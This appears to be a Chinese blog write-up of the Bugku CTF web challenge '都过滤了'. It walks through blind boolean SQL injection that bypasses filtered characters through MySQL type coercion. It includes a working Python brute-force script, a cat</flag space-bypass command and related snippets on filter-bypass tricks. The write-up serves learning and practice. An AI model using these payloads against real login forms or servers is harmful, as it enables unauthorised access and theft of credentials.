ctf-WEB-都过滤了

最新推荐文章于 2024-04-18 13:53:31 发布
最新推荐文章于 2024-04-18 13:53:31 发布
阅读量1k 收藏 3
点赞数 4
分类专栏: ctf 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_001/article/details/124664837
版权

题目地址:跳转提示

打开网址,看到一个登陆页面:

首先随便输入用户名和密码,发现只报错显示用户名错误,因此推出后端先判断用户名,可能使用sql语句:SELECT * FROM tab_name WHERE uname=...

发现'#','-- ',' ','or','and','/*'都被过滤了

尝试判断闭合,发现用户名无论是admin'还是admin",都没有其他报错,先预设是单引号闭合

输入用户名为a'-'0,密码123

发现结果显示密码错误

 可推出,确实是单引号闭合

原理:

在mysql中,当对字符串进行运算或者比较时,首字母非数值的字符串都默认转换为数值0,如:
'a'-'b'=0    'a'-0=0   'a'-1=-1  '1a'+0=1

因此,用户名为a'-'0,相当于SELECT * FROM tab_name WHERE uname='a'-'0'

因为加减运算符优先级高于比较符号,因此做判断时相当于找出表格中uname=0的字符串,而之前说过,字符串作比较时,首字母非数值类型的字符串都默认转换为0,因此就相当于找出表格中索引首字母非数值类型的用户名

于是可利用这一特点,构造payload

uname=a'-(ascii(substr((passwd)from(1)))=97)-'b&passwd=123

ascii(substr((passwd)from(1)))=97的意思是判断passwd的第一个字母的ASCII值是否是97,是的话返回1,不是的话,返回0。可知,若等式不成立,则构成'a'-0-'b'=0,登录报密码错误,若成立,则构成'a'-1-'b'=-1,则返回用户名错误。

于是由脚本:

import requests
ra=requests.session()
url='http://114.67.175.224:11846/login.php'
Headers={"User-Agent":"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Mobile Safari/537.36"}
s=""
for j in range(1,33):
    for i in range(48,127):
        u="a'-(ascii(substr((passwd)from({0})))={1})-'b".format(j,i)
        data={"uname":u,"passwd":"123"}
        pa=ra.post(url=url,headers=Headers,data=data).text
        if "username error!!" in pa:
            s+=chr(i)
            break
print(s)

这里要注意,访问的url是/login.php而不是/index.php

运行得到结果:4dcc88f8f1bc05e7c2ad1a60288481a2

md5解码得到密码为bugkuctf

输入账号密码,得到:

 发现空格等符号依然被过滤

尝试指令cat</flag,得到结果

 

榴莲 蛋挞
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF---Web---SQL注入---03---联合注入+关键字过滤
qq_22160557的博客
07-29 802
文章目录前言一、题目描述二、解题步骤1、回显判断注入方式2、尝试列数3、寻找注入点4、尝试注入(库,表,列,字段)三、总结 前言 题目分类: CTF—Web—SQL注入—03—联合注入+关键字过滤 一、题目描述 题目:SQL注入 链接:http://192.168.87.175 二、解题步骤 1、回显判断注入方式 Step1: http://192.168.87.175/viewld.do?ldid=2,回显正常。有内容 Step2: http://192.168.87.175/viewld.do?ld
CTFHUB web-rce-过滤
2301_79783285的博客
12-18 624
回车键,即键盘上的ENTER键,是一个比较有用的键,在文字编辑时,回车键的作用是换行,在输入网址时回车键的作用是“转到”,在执行DOS命令时,回车键的作用是执行。
bugku-web-都过滤
最新发布
qq_75121443的博客
04-18 197
这里几乎没有其他线索,现在能想到的有两种,SQL注入和爆破。别说,页面还挺帅,这里所有链接点都是假的。得到最终密码bugkuctf。可以用{}来代替空格作用。得到账号为admin。
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1612
3.简单的sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
Bugku WEB 都过滤
qq_41696858的博客
07-25 713
这题呢,网上有很多解法,那都是这个题目没有完善之前的,现在来说已经修复的差不多了,像以前的直接/flag当然行不通,源码泄露啥的也被删了 严格来说,其实这是一道sql注入题 打开场景,啥提示没有,那就dirsearch扫一波,在一番查找过后,发现images文件夹下有一张图片,那就是作者给的提示,也就是不是数字开头的字符串在比较时会自动转成0 那么他的提示里0=0也就是永真,所以可以爆出所有的用户名 友情小tips:三个0异或不是1,而是0,不要想当然,这就是一个存粹的数学问题 最后一个式子给出了如何有条件
bugku web 都过滤
m0_58189778的博客
08-19 1574
题目:都过滤了 知识点:SQL注入、SQL注入绕过、命令执行绕过 工具: 解题: 确定题型: 点开链接: 是一个登录框,再查看源码,发现该界面除了登录指向一个php脚本外,其他连接都是无效的,所以此题的玄机应该就在登录这里。这种情况下,常见的是两种,一是弱口令爆破,二是SQL注入攻击,我没有尝试第一种,因为看了别人的提示确定了这是一个SQL注入(注意,网上有很多非SQL注入的解题,这些是因为早期这个题目不完善留下的漏洞,现在经过完善后应该就只有SQL注入能够解题) 找注入点: .
CTF-Web-Challenge:使用PHP在Web中进行CTF挑战
03-25
在网络安全领域,Capture The Flag(CTF)是一种流行的竞赛形式,让参与者通过解决各种安全问题来展示和提升自己的技能。...参与CTF挑战,不断提升自己的安全防护能力,对于任何Web开发者来说都是一次宝贵的学习经历。
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
bugkuctf解题-WEB
05-04
在CTF(Capture The Flag)比赛中,Web安全领域是一个重要的环节,它涵盖了各种网络安全技能,如漏洞挖掘、代码审计、Web应用渗透测试等。本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验...
ctf-writeups:CTF撰写
05-23
"骰子CTF2021"是一个具体的CTF赛事,其中的"水印即服务(Web,245点,20个解决方案)"是一道网络类别题目,难度相对较高,总共有20种不同的解题方法。 对于这道题目,我们可能涉及到的知识点主要集中在JavaScript上...
SQLi-CTF-master.zip
04-09
- **ASCII与十六进制转换**:在某些情况下,需要转换字符编码以绕过过滤。 4. **解题技巧**: - **理解题意**:分析题目给出的信息,确定可能的注入点。 - **信息收集**:利用注入获取数据库名、表名、列名等...
SSTI模板注入-中括号、args、下划线、单双引号、双大括号被过滤绕过(ctfshow web入门368)
T1ngSh0w的博客
03-29 939
SSTI模板注入漏洞 中括号、args、下划线、单双引号、双大括号被过滤 ctfshow web入门368
Bugku,Web:都过滤
Pai_Space
07-26 285
Bugku,Web:都过滤
SSTI模板注入-单双引号被过滤绕过(ctfshow web入门363)
T1ngSh0w的博客
03-18 482
我们获取基类以及所有子类的时候,可以使用()或者[]来获取。当我们使用可以执行shell命令的方法时,必定要使用单引号或者双引号来包裹我们执行的命令,这时我们可以使用request.args.参数名或者request.values.参数名等传参方式将我们的命令等需要引号包裹的字符串进行传参即可。
Bugku-CTF之sql注入2 (全都tm过滤了绝望吗?)
weixin_30593443的博客
07-04 1185
Day 38 sql注入2 200 http://123.206.87.240:8007/web2/ 全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% ​ 本题要点:DS_Store源码泄露 用bp弱口令爆一波 没有结果~ 用御剑扫描后台 ...
CTFHub技能书解题笔记-RCE-过滤空格、过滤目录分隔符、过滤运算符
qq_43006864的博客
04-01 3800
一、过滤空格 过滤了空格。 引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 直接开始解题 这里就用<来绕过。flag还是再界面源码。 二、过滤目录分隔符 题目提示,这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx
CTF中,命令中空格被过滤的解决方法
m0_46315342的博客
08-20 2298
转载于: 作者:HyyMbb 链接:https://blog.csdn.net/a3320315/article/details/99773192 来源:CSDN博客
mysql括号被过滤_【每周一题】SQL注入绕过过滤字符
weixin_39839726的博客
02-02 3641
本帖最后由 Net_S 于 2017-5-30 22:13 编辑sql注入的原因sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。比如上面的 String sql = "select id,no from user where id=" + id;我们希望用户输入的 id 的...
ctfshow-web命令执行(web45-60)
m0_50268414的博客
11-29 2589
文章目录web45 &&等于; tab等于spaceweb46 过滤数字\*\$web47 <等于空格 ||解决黑洞web48 没什么软用web49 仍然没什么软用web50 过滤了%09%26web51 过滤了tacweb52 过滤了>和<web53 添加了回显web54 丧心病狂不让用''绕过web55 过滤了所有字母web56 过滤了所有字母2web57 \$(())web58 无回显web59 无回显2web60 无回显3 web45 &&等于; t
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值